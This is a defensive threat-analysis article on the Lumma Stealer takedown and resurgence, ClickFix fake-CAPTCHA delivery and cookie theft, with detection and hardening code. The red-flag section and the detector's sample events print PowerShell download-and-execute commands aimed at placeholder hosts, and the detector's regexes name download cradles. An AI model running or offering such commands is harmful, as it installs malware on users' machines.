Lumma Stealer was supposed to be dead. In May 2025, Microsoft’s Digital Crimes Unit, the U.S. Department of Justice, Europol, and Japan’s JC3 ran one of the largest infostealer takedowns on record, seizing roughly 2,300 domains and severing the command-and-control backbone that thousands of criminals relied on. Within weeks, it was back. By mid-2026, Lumma Stealer is once again among the most active credential-harvesting tools in the world, and its rapid recovery has become a case study in why malware-as-a-service is so hard to kill.

This analysis breaks down what the takedown actually accomplished, how the operation rebuilt, the hard numbers behind the campaign, and what the resurgence means for defenders watching credential theft fuel ransomware in 2026.

What Lumma Stealer Is and Why It Matters in 2026

Lumma Stealer, also tracked as LummaC2, is an information-stealing malware sold as a subscription service on underground forums. It does one job well. It lands on a Windows machine, scrapes everything of value, and exfiltrates it to attacker infrastructure in seconds. Microsoft describes it as “the favored info-stealing malware used by hundreds of cyber threat actors,” a line from the company’s own takedown announcement that captures why this single family draws so much attention.

The targets are predictable and lucrative: saved browser passwords, autofill data, credit card numbers, banking session details, and cryptocurrency wallet files. Crucially, Lumma also harvests session cookies and authentication tokens. Those tokens let an attacker replay an already-authenticated session, which means a stolen cookie can sidestep multi-factor authentication entirely. The victim did everything right, enabled MFA, and still loses the account because the attacker walks in through a valid session rather than the front door.

Lumma Stealer matters in 2026 because it sits at the front of the ransomware kill chain. Stolen credentials and session data from infostealer logs are now a primary initial-access method. Security researchers tracking this pattern found that a majority of ransomware victims had corporate domain credentials surface in stealer-log marketplaces before the ransomware ever hit. Lumma is one of the engines feeding that pipeline, which is why a single piece of commodity malware became the focus of a multinational legal operation.

The May 2025 Takedown: 2,300 Domains in One Strike

On May 13, 2025, Microsoft’s Digital Crimes Unit (DCU) filed suit in the U.S. District Court for the Northern District of Georgia. The court order authorized Microsoft to seize, suspend, or block the domains that formed the spine of Lumma’s network. Eight days later, on May 21, Microsoft and its partners went public with the full scope of the operation.

The numbers were significant. Microsoft seized, suspended, or blocked approximately 2,300 malicious domains. More than 1,300 of those domains were redirected to Microsoft-controlled sinkholes, which let investigators watch infected machines try to phone home and quietly cut them off from their operators. In parallel, the Department of Justice seized Lumma’s central command structure and disrupted the online marketplaces where the malware and its stolen logs were sold. Europol’s European Cybercrime Centre and Japan’s JC3 coordinated suspensions of infrastructure hosted in their regions.

Steven Masada, Assistant General Counsel in Microsoft’s DCU, laid out the legal mechanics plainly: “Via a court order granted in the United States District Court of the Northern District of Georgia, Microsoft’s DCU seized and facilitated the takedown, suspension, and blocking of approximately 2,300 malicious domains that formed the backbone of Lumma’s infrastructure.”

To measure the footprint they were dismantling, Microsoft scanned for active infections. Between March 16 and May 16, 2025, the company identified more than 394,000 Windows computers worldwide infected by Lumma. That is a 60-day snapshot, not a lifetime total, which makes it a conservative floor rather than a ceiling. Victims spanned schools, banks, hospitals, and critical services across multiple countries.

Takedown by the Numbers

The table below consolidates the verified figures from the May 2025 operation and the surrounding telemetry that researchers published through 2025 and into 2026.

Metric | Figure | Source / Period
--- | --- | ---
Malicious domains seized, suspended, or blocked | ~2,300 | Microsoft DCU, May 2025
Domains redirected to sinkholes | 1,300+ | Microsoft DCU, May 2025
Infected Windows devices identified | 394,000+ | Microsoft, Mar 16 to May 16, 2025
Court jurisdiction | N. District of Georgia | U.S. District Court, May 13, 2025
Agencies coordinating | Microsoft, DOJ, Europol, JC3 | May 2025
Resurgence detected | Within weeks | Trend Micro, June to July 2025
Credentials stolen by infostealers, H1 2025 | 1.8 billion | Industry threat reporting, 2025
Infected devices behind H1 2025 totals | 5.8 million | Industry threat reporting, 2025

One caveat worth stating directly. Microsoft’s 394,000 figure covers a two-month window. Secondary reporting tied to the case cited far larger cumulative numbers, including roughly 10 million infections attributed to Lumma over its operational life and at least 1.7 million instances where it was used to steal information. Those higher figures come from law-enforcement attribution rather than Microsoft’s own scan, so treat them as the broader historical estimate and the 394,000 as the audited two-month count.

Back to Business: How Fast Lumma Recovered

The disruption bought defenders weeks, not months. Trend Micro, which tracked the operation closely, reported that Lumma “has re-emerged shortly after its takedown” and that the group behind it returned intent on employing more covert tactics. Its telemetry showed the recovery curve clearly: from June to July 2025, the number of targeted accounts began resurging, climbing back toward pre-takedown levels.

By February 2026, Bitdefender confirmed Lumma had rebuilt its infrastructure and was spreading worldwide again. The operators did not need to reinvent the malware. They needed new domains, new hosting, and a fresh set of distribution channels, all of which are cheap and abundant. The code itself, the exfiltration logic, and the affiliate base survived the legal strike intact.

This is the core lesson of the Lumma Stealer case. A takedown that removes 2,300 domains and a command server inflicts real cost, but it attacks the perimeter of a service, not its center of gravity. The center of gravity is the developer team, the affiliate network, and the demand from buyers, none of which a domain seizure touches. As long as that demand exists, rebuilding is a logistics problem, and these operators are good at logistics.

The ClickFix and Fake CAPTCHA Distribution Machine

Lumma’s signature delivery method is a social-engineering trick known as ClickFix, built around fake CAPTCHA and “human verification” pages. It is effective because it weaponizes a habit users have been trained to follow without thinking: prove you are human.

How the ClickFix Lure Works

A victim lands on a compromised or malicious site and sees what looks like a routine verification box. Instead of clicking a checkbox, the page instructs them to complete a few steps: press the Windows key and R, paste a command the page has already copied to their clipboard, then press Enter. That sequence opens the Windows Run dialog and executes a PowerShell command. PowerShell then quietly downloads and runs the Lumma payload from attacker infrastructure.

The danger is that the victim runs the malware themselves. There is no malicious attachment to scan, no drive-by download for a browser to block. File-based defenses see a user voluntarily opening a system dialog and typing a command. SentinelOne researchers describe this as weaponizing “verification fatigue,” the reflexive compliance people show toward CAPTCHA-style prompts after years of clicking them.

The Scale of the Lure

The reach of these campaigns is substantial. Kaspersky’s Securelist team documented one malvertising wave in which, between September 22 and October 14, 2024, more than 140,000 users encountered the malicious ad scripts and over 20,000 were redirected to infected sites serving fake CAPTCHA pages and bogus update notifications. Lumma also rides cracked software downloads, malicious search ads, and compromised legitimate websites, spreading the same ClickFix pattern across many entry points.

For defenders, the takeaway is that endpoint and email filtering are not enough on their own. The decisive control here is user awareness plus restricting or monitoring how the Run dialog and PowerShell get invoked, because the attack chain depends on a human action that traditional malware delivery never required.
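The ClickFix chain described above leaves a distinctive shape in process-creation telemetry: an interpreter launched from explorer.exe (the Run dialog's parent), hidden-window or no-profile flags, a download cradle, and execution from a user-writable path. The following is an added example, not code from the article or from any of the vendors it cites; the event format, the sample events and the alert threshold are assumptions, and the log lines are constructed.

```python
"""Triage process-creation events for the ClickFix chain.

Added example, not from the article. Input is constructed telemetry shaped
like the parent image / image / command line fields of Sysmon Event ID 1 or
Windows Security Event 4688; the events and thresholds are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Only PowerShell launches are scored here; other script hosts would need
# their own indicator set.
SCRIPT_HOSTS = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

# Each indicator is one link of the ClickFix chain. One hit alone is routine
# admin activity; several together is the lure's fingerprint.
INDICATORS = {
    # Win+R launches the interpreter from explorer.exe, not from cmd.exe,
    # a terminal, a scheduled task, or a management agent.
    "spawned-from-shell": lambda ev: bool(
        re.search(r"\\explorer\.exe$", ev.parent_image, re.I)),
    # Hidden window, no profile, or policy bypass: the user is not meant to see it.
    "stealth-flags": lambda ev: bool(re.search(
        r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass",
        ev.command_line, re.I)),
    # Fetching the payload from attacker infrastructure.
    "download-cradle": lambda ev: bool(re.search(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|bitsadmin|certutil)\b|https?://",
        ev.command_line, re.I)),
    # Running what was fetched, typically from a user-writable staging path.
    "staged-execution": lambda ev: bool(re.search(
        r"\b(start|start-process|saps|iex|invoke-expression)\b|"
        r"\$env:temp|%temp%|\\appdata\\",
        ev.command_line, re.I)),
}

ALERT_THRESHOLD = 3  # assumption: tune against your own baseline


def clickfix_indicators(ev: ProcessEvent) -> list[str]:
    """Return the names of every indicator the event matches, in table order."""
    if not SCRIPT_HOSTS.search(ev.image):
        return []
    return [name for name, check in INDICATORS.items() if check(ev)]


def triage(events):
    """Return (event, indicators) pairs for events at or above the threshold."""
    alerts = []
    for ev in events:
        hits = clickfix_indicators(ev)
        if len(hits) >= ALERT_THRESHOLD:
            alerts.append((ev, hits))
    return alerts


# Constructed sample events: two benign launches, two ClickFix-style launches.
PS5 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS5,
                 "powershell.exe -NoProfile -Command Get-Service -Name Spooler"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS5,
                 r"powershell.exe -File C:\Scripts\backup.ps1"),
    # The command shape the article shows in its defense section, pasted into Win+R.
    ProcessEvent(r"C:\Windows\explorer.exe", PS5,
                 r'powershell -w hidden -nop -c "iwr https://malicious[.]example/x '
                 r'-OutFile $env:TEMP\a.exe; start $env:TEMP\a.exe"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 'pwsh -ep bypass -c "irm https://verify[.]example/u.ps1 | iex"'),
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT {hits}: {ev.command_line}")
```

The two benign events each trip exactly one indicator and stay below the threshold; the two lure-shaped events trip all four. Scoring by counting links of the chain, rather than matching one string, is what keeps a rule like this useful after the operators rotate domains and flag spellings. On a host that was hit, the Run dialog's own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a cheap corroborating artifact for the pasted command.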

Malware-as-a-Service: The Business Model Behind Lumma

Lumma Stealer is not a tool a lone hacker built and hoards. It is a product. It runs on a subscription model where the developers handle the malware, the control panel, and the stolen-log logistics, while paying affiliates handle distribution and keep a cut. This division of labor is exactly what makes infostealers so resilient and so widespread.

The economics are brutal for defenders. Infostealer subscriptions have been documented at roughly $200 per month on average across the malware-as-a-service market in recent reporting, with tiered plans that scale up for buyers who want more capability or higher-value targets. At that price, the barrier to entry is a rounding error against the potential payout from a single corporate credential set that opens the door to ransomware. A four-figure malware subscription that yields a million-dollar ransom is the math driving the entire category.

That low-cost, high-reward ratio explains why takedowns alone cannot win. Every disruption raises the operators’ costs temporarily, but the underlying demand from hundreds of affiliate buyers stays constant. When Microsoft seized Lumma’s domains, it did not change the calculus for the thousands of criminals who still wanted exactly what Lumma sells. They waited a few weeks and came back.

Lumma vs. StealC, Vidar, RedLine, and ACRStealer

Lumma does not operate in a vacuum. The infostealer market is crowded, competitive, and quick to reshuffle whenever one family gets disrupted. As of early 2026, threat intelligence tracking active distribution put four families at the top of the pile: LummaC2, ACRStealer, StealC, and Vidar. RedLine, once a dominant name, was knocked down hard by the international Operation Magnus in late 2024, and rivals moved to absorb the displaced demand.

The pattern across this market is musical chairs. When law enforcement removes one stealer, affiliates migrate to whichever competitor offers the best uptime, evasion, and price. That mobility is why no single takedown dents the overall volume of stolen credentials for long. The table below summarizes the competitive landscape as reported through 2025 and into 2026.

Stealer family | Status in 2026 | Notable trait | Primary delivery
--- | --- | --- | ---
LummaC2 (Lumma) | Active, rebuilt after May 2025 takedown | MaaS scale, hundreds of affiliates | Fake CAPTCHA / ClickFix, malvertising
ACRStealer | Active, top-three distribution in early 2026 | Rapid growth filling the RedLine gap | Cracked software, malvertising
StealC | Active, top-four family | Frequent feature updates | Loaders, phishing
Vidar | Active, long-running family | Veteran codebase, steady demand | Cracked software, phishing
RedLine | Disrupted by Operation Magnus, late 2024 | Former market leader, displaced | Phishing, malvertising (historical)

The competitive dynamic cuts both ways for Lumma. Its quick recovery let it hold market position, but ACRStealer’s surge shows how fast a rival can capitalize when a leader stumbles. For buyers, this is a healthy market with multiple suppliers. For everyone else, it is a resilient ecosystem where supply reliably meets demand.

Why Stolen Session Cookies Beat Your MFA

The single most important technical capability in Lumma’s toolkit is session cookie theft. Multi-factor authentication has rightly become the baseline defense for account security, and it stops the overwhelming majority of password-only attacks. Infostealers route around it.

When you log in to a service and complete an MFA challenge, the server hands your browser a session token, a cookie that says “this user already proved who they are, let them through.” That cookie can stay valid for hours, days, or weeks. Lumma grabs it straight from the browser’s storage. An attacker who imports that cookie into their own browser inherits your authenticated session without ever seeing your password or your one-time code. The MFA challenge already happened, and the attacker is reusing its result.

This is why a credential-theft story is also an MFA-bypass story. The defenses that blunt cookie theft are different from the ones that stop password reuse: shorter session lifetimes, binding tokens to a device or IP, re-authentication for sensitive actions, and phishing-resistant methods like passkeys that do not leave a long-lived reusable secret sitting in browser storage. Organizations that treat MFA as a finished project, rather than one layer, are exactly the ones Lumma is built to beat.
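The controls listed above (shorter lifetimes, client binding, step-up re-authentication) are all server-side decisions about what a presented cookie is worth. The session store below is an added example, not code from the article or any product it names; it assumes the application can derive an opaque client fingerprint on every request (how that fingerprint is built is out of scope and represented by a string), and the TTLs are assumptions to tune.

```python
"""Server-side session store that denies value to a stolen cookie.

Added example, not from the article. The client_binding argument stands in
for whatever device fingerprint or device-bound proof the application can
check on each request; deriving it is out of scope here.
"""
import hmac
import secrets
import time
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    client_binding: str   # opaque fingerprint of the client that logged in
    issued_at: float
    last_seen: float
    last_mfa: float       # when this session last passed an MFA challenge


class SessionStore:
    """In-memory store; the dict would be Redis or a database in production."""

    def __init__(self, idle_ttl=15 * 60, absolute_ttl=8 * 3600,
                 step_up_window=5 * 60, clock=time.time):
        self.idle_ttl = idle_ttl              # assumption: 15 minutes idle
        self.absolute_ttl = absolute_ttl      # assumption: 8 hours hard cap
        self.step_up_window = step_up_window  # assumption: re-prove MFA after 5 min
        self._clock = clock
        self._sessions: dict[str, Session] = {}

    def issue(self, user: str, client_binding: str) -> str:
        """Called right after a successful login plus MFA; returns the cookie value."""
        now = self._clock()
        token = secrets.token_urlsafe(32)
        self._sessions[token] = Session(user, client_binding, now, now, now)
        return token

    def record_mfa(self, token: str) -> None:
        """Reset the step-up clock after a fresh MFA challenge on this session."""
        if token in self._sessions:
            self._sessions[token].last_mfa = self._clock()

    def resolve(self, token: str, client_binding: str, sensitive: bool = False):
        """Validate a presented cookie. Returns (user or None, reason)."""
        s = self._sessions.get(token)
        if s is None:
            return None, "unknown or revoked token"
        now = self._clock()
        if now - s.issued_at > self.absolute_ttl:
            del self._sessions[token]
            return None, "absolute lifetime exceeded"
        if now - s.last_seen > self.idle_ttl:
            del self._sessions[token]
            return None, "idle timeout"
        if not hmac.compare_digest(s.client_binding.encode(), client_binding.encode()):
            # A valid token arriving from a different client is the replay
            # signature. Revoking it also logs the real user out, which is
            # the desired outcome: the stolen copy is now worthless too.
            del self._sessions[token]
            return None, "client binding mismatch (session revoked)"
        if sensitive and now - s.last_mfa > self.step_up_window:
            # Payment, password change, MFA enrolment: a stolen cookie alone
            # must not be enough even while the session is otherwise valid.
            return None, "step-up authentication required"
        s.last_seen = now
        return s.user, "ok"


class FakeClock:
    """Controllable clock so the lifetimes can be exercised without sleeping."""

    def __init__(self, t: float = 0.0):
        self.t = t

    def __call__(self) -> float:
        return self.t


if __name__ == "__main__":
    clock = FakeClock(1000.0)
    store = SessionStore(clock=clock)
    cookie = store.issue("alice", "victim-laptop")
    print(store.resolve(cookie, "victim-laptop"))   # ('alice', 'ok')
    print(store.resolve(cookie, "attacker-box"))    # replay from another client: revoked
    print(store.resolve(cookie, "victim-laptop"))   # the legitimate copy is gone too
```

Binding to the source IP alone, one of the options the text mentions, is the weakest form of this check: mobile and corporate NAT addresses change under legitimate users, so teams usually bind to a device-held secret or TLS-level property instead and treat IP as a risk signal. The design choice that matters most is the last one in `resolve`: even a session that passes every freshness check still cannot perform a sensitive action without a recent MFA proof, so a lifted cookie buys the holder read access at most.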

Historical Context: From RedLine to Lumma’s Reign

Infostealers are not new, but their role has changed. A few years ago they were treated as commodity nuisance malware, the kind that lifted gaming logins and a few saved passwords. The shift came when criminals realized that the same stolen browser data, especially corporate credentials and session cookies, was the cleanest possible on-ramp to enterprise networks.

RedLine dominated the early wave and became shorthand for the category until Operation Magnus disrupted it in late 2024. Lumma, which had been growing as a MaaS offering since 2022, was well positioned to absorb the displaced affiliates. By 2025 it was the favored stealer for hundreds of actors, which is precisely why Microsoft and the DOJ targeted it. The 2024 to 2026 arc shows a market that does not collapse when its leader falls. It promotes the next contender.

The aggregate numbers underline how the category scaled. In 2024, infostealers were used to steal an estimated 2.1 billion credentials, over 60 percent of the roughly 3.2 billion credentials stolen from organizations that year. By the first half of 2025, infostealers had harvested 1.8 billion credentials from 5.8 million infected devices in just six months. Lumma’s takedown and recovery played out against that backdrop of relentless, rising volume.

Market Impact: What the Resurgence Costs Defenders

The practical impact of Lumma’s return is measured in incident response hours and ransomware payouts. Because infostealer logs feed initial access, every active Lumma campaign is a feeder system for the more destructive attacks that follow. Researchers found that 54 percent of ransomware victims had domain credentials appear in stealer-log marketplaces before the ransomware struck. That correlation makes infostealer activity a leading indicator, not a separate problem.

For security teams, the resurgence shifts the cost-benefit math on monitoring. Dark web and stealer-log monitoring, once a nice-to-have, becomes a frontline control because spotting your own credentials in a fresh Lumma log can be the only warning before a ransomware actor buys them. For the broader market, persistent infostealer activity sustains demand for endpoint detection, identity threat detection, and the passwordless and session-hardening products that directly counter cookie theft.

There is also a clear cost to the takedown model itself. The Lumma operation was expensive, multinational, and legally complex, and it bought a few weeks. That does not make takedowns pointless, but it reframes them as one tool among many rather than a solution. The durable wins come from raising the cost of doing business for operators and shrinking the value of what they steal, both of which are slower and less satisfying than a domain seizure but harder to reverse.

What Experts Are Saying About Lumma Stealer

The expert consensus around Lumma is unusually aligned: the takedown mattered, and it was never going to be permanent.

Microsoft’s Steven Masada framed the original disruption in terms of scale and importance, calling Lumma “the favored info-stealing malware used by hundreds of cyber threat actors” and detailing the seizure of “approximately 2,300 malicious domains that formed the backbone of Lumma’s infrastructure.”

Trend Micro’s threat researchers were among the first to document the rebound, noting that Lumma “has re-emerged shortly after its takedown” with operators intent on employing more covert tactics, and that targeted accounts began resurging from June to July 2025.

Bitdefender’s analysis emphasized the mechanics of why the takedown hurt at all: by severing the domains, the operation prevented Lumma from receiving instructions and exfiltrating stolen data, which is exactly the function the operators raced to rebuild. By February 2026, Bitdefender confirmed that rebuild was complete and the malware was again spreading worldwide. SentinelOne’s researchers, focused on delivery, summarized the ClickFix trend as weaponizing verification fatigue, capturing why the fake CAPTCHA lure keeps working even against users who consider themselves careful.

Five Predictions for Infostealers Through 2026 and 2027

Based on the trajectory of the Lumma Stealer case and the broader market, here is where the evidence points.

  • Takedowns will keep coming, and so will the rebounds. Expect at least one more major infostealer disruption in 2026, and expect the disrupted family, or a near-clone, to be operational again within one to three months, following the Lumma and RedLine pattern.
  • Session cookie theft becomes the headline capability. As passkeys and stronger MFA spread, attackers lean harder on stealing live sessions. Cookie theft, not password theft, will define the next wave of account takeovers.
  • ClickFix-style lures expand beyond CAPTCHA. The “make the victim run the command” pattern is too effective to stay tied to fake verification pages. Expect it to spread into fake software updates, fake support flows, and AI-tool impersonation.
  • The market consolidates around three to four MaaS leaders. LummaC2, ACRStealer, StealC, and Vidar will keep trading position, with affiliates migrating fluidly after each disruption rather than the category shrinking.
  • Stealer-log monitoring becomes a standard control. Treating leaked credentials as a leading indicator of ransomware moves from advanced security teams to mainstream practice, because the 54 percent correlation is too strong to ignore.

How to Defend Against Lumma Stealer

Lumma’s strengths point straight at the defenses that work. Because the attack depends on a user running a PowerShell command, user awareness is a genuine control here, not a checkbox. Teach people that no legitimate CAPTCHA ever asks them to press Windows+R and paste a command. That single piece of knowledge breaks the entire ClickFix chain.

Technically, the priorities are restricting or logging script execution, shortening session lifetimes so stolen cookies expire faster, moving high-value accounts to phishing-resistant passkeys, and monitoring stealer-log marketplaces for your own domains. Endpoint detection still matters for catching the payload, but the decisive layer is denying value to what Lumma steals: a cookie that expired is worthless, and a passkey login leaves no reusable secret to lift.
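Monitoring stealer-log marketplaces for your own domains comes down to matching a credential dump against the domains you own without mishandling the passwords in it. The matcher below is an added example, not code from the article or from any monitoring vendor; it assumes a dump already obtained through a legitimate feed, in the URL:USER:PASS line layout, and the sample lines and the owned-domain list are constructed.

```python
"""Match a stealer-log credential dump against an organization's own domains.

Added example, not from the article. Assumes lines in the URL:USER:PASS
layout; the log content and OWNED_DOMAINS below are constructed.
"""
import hashlib
from urllib.parse import urlsplit

# Assumption: the organization's registered domains.
OWNED_DOMAINS = {"example-corp.com"}


def in_owned_domain(host: str) -> bool:
    """True for an owned domain or any subdomain; a plain suffix test would
    also accept look-alikes such as notexample-corp.com."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in OWNED_DOMAINS)


def parse_line(line: str):
    """Split URL:USER:PASS from the right, since the URL itself holds colons.
    Returns (host, user, password) or None for blank, comment or malformed lines.
    Known limitation: a password containing ':' shifts the split."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.rsplit(":", 2)
    if len(parts) != 3:
        return None
    url, user, password = parts
    host = urlsplit(url).hostname or url.lower()  # tolerate bare hostnames
    return host, user, password


def match_owned(lines):
    """Return findings for lines touching an owned site or an owned identity.

    The password is never stored or printed; a truncated hash lets analysts
    see reuse across entries without exposing the secret."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host, user, password = rec
        kinds = []
        if in_owned_domain(host):
            kinds.append("corporate-site")       # login to one of our services
        if "@" in user and in_owned_domain(user.rsplit("@", 1)[1]):
            kinds.append("corporate-identity")   # our email used on any site
        if kinds:
            findings.append({
                "host": host,
                "user": user,
                "kinds": kinds,
                "pw_fingerprint": hashlib.sha256(password.encode()).hexdigest()[:12],
            })
    return findings


# Constructed sample dump, including two look-alike domains that must not match.
SAMPLE_LOG = """\
# constructed sample in the URL:USER:PASS layout
https://sso.example-corp.com/login:jdoe@example-corp.com:Winter2025!
https://mail.google.com/:jdoe@gmail.com:hunter2
https://vpn.example-corp.com:443/:alice:P@ssw0rd
https://github.com/login:alice@example-corp.com:Winter2025!
http://notexample-corp.com/:bob:pass1234
https://example-corp.com.evil.example/:carol:pass5678
"""

if __name__ == "__main__":
    for f in match_owned(SAMPLE_LOG.splitlines()):
        print(f"{f['host']:32} {f['user']:28} {f['kinds']} pw#{f['pw_fingerprint']}")
```

Three of the six lines are findings: the SSO login, the VPN login, and a corporate identity used on a third-party site. The last kind matters even though the site is not yours, because a reused password on a personal account is often the one that also opens a corporate one, and the equal fingerprints on the first and fourth findings show exactly that reuse. Every finding is a reason to reset the account and invalidate its sessions before the log reaches a ransomware buyer, which is the leading-indicator use the article describes.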

For individuals, the basics hold. Avoid cracked software, the single most common Lumma delivery vector. Use a password manager so credentials are not sitting in plaintext browser storage. Turn on MFA everywhere, knowing it is necessary but not sufficient against cookie theft, and stay skeptical of any “verification” step that wants you to run a command. The example below shows the kind of ClickFix command a fake CAPTCHA page tries to get you to paste into the Run dialog. If you ever see something like it, close the tab.

# RED FLAG: no real "human verification" ever asks you to run this
powershell -w hidden -nop -c "iwr https://malicious[.]example/x -OutFile $env:TEMP\a.exe; start $env:TEMP\a.exe"
# Windows+R, paste, Enter = you just installed the infostealer yourself

Frequently Asked Questions

Is Lumma Stealer still active in 2026?

Yes. Despite the May 2025 takedown that seized roughly 2,300 domains, Lumma rebuilt within weeks. Trend Micro tracked its resurgence from June to July 2025, and Bitdefender confirmed in February 2026 that it had rebuilt its infrastructure and was spreading worldwide again.

How does Lumma Stealer infect computers?

Its signature method is ClickFix: fake CAPTCHA or “human verification” pages that instruct the victim to press Windows+R, paste a pre-copied command, and hit Enter. That runs a PowerShell command which downloads the malware. It also spreads through cracked software, malicious ads, and compromised websites.

Can Lumma Stealer bypass multi-factor authentication?

Indirectly, yes. Lumma steals session cookies and authentication tokens from the browser. An attacker who reuses a valid session cookie inherits an already-authenticated session, so the MFA challenge the victim already passed is effectively reused. Phishing-resistant passkeys and short session lifetimes reduce this risk.

How many devices did Lumma Stealer infect?

Microsoft identified more than 394,000 infected Windows devices worldwide in a single 60-day window from March 16 to May 16, 2025. Broader law-enforcement attribution cited in case coverage put cumulative infections far higher, on the order of millions, over the malware’s operational life.

What data does Lumma Stealer steal?

Saved browser passwords and autofill data, credit card details, banking information, cryptocurrency wallet files, and session cookies and authentication tokens. The cookies and tokens are the most dangerous because they enable session reuse that can bypass MFA.

Who took down Lumma Stealer?

Microsoft’s Digital Crimes Unit led the operation under a court order from the U.S. District Court for the Northern District of Georgia, coordinating with the U.S. Department of Justice, Europol’s European Cybercrime Centre, and Japan’s JC3. The DOJ separately seized Lumma’s central command structure.

Why did the takedown fail to stop Lumma permanently?

A domain seizure removes infrastructure but not the developers, the affiliate network, or the buyer demand that sustains a malware-as-a-service operation. With the code and the affiliate base intact, rebuilding was a logistics task the operators completed in weeks.

Sources and Further Reading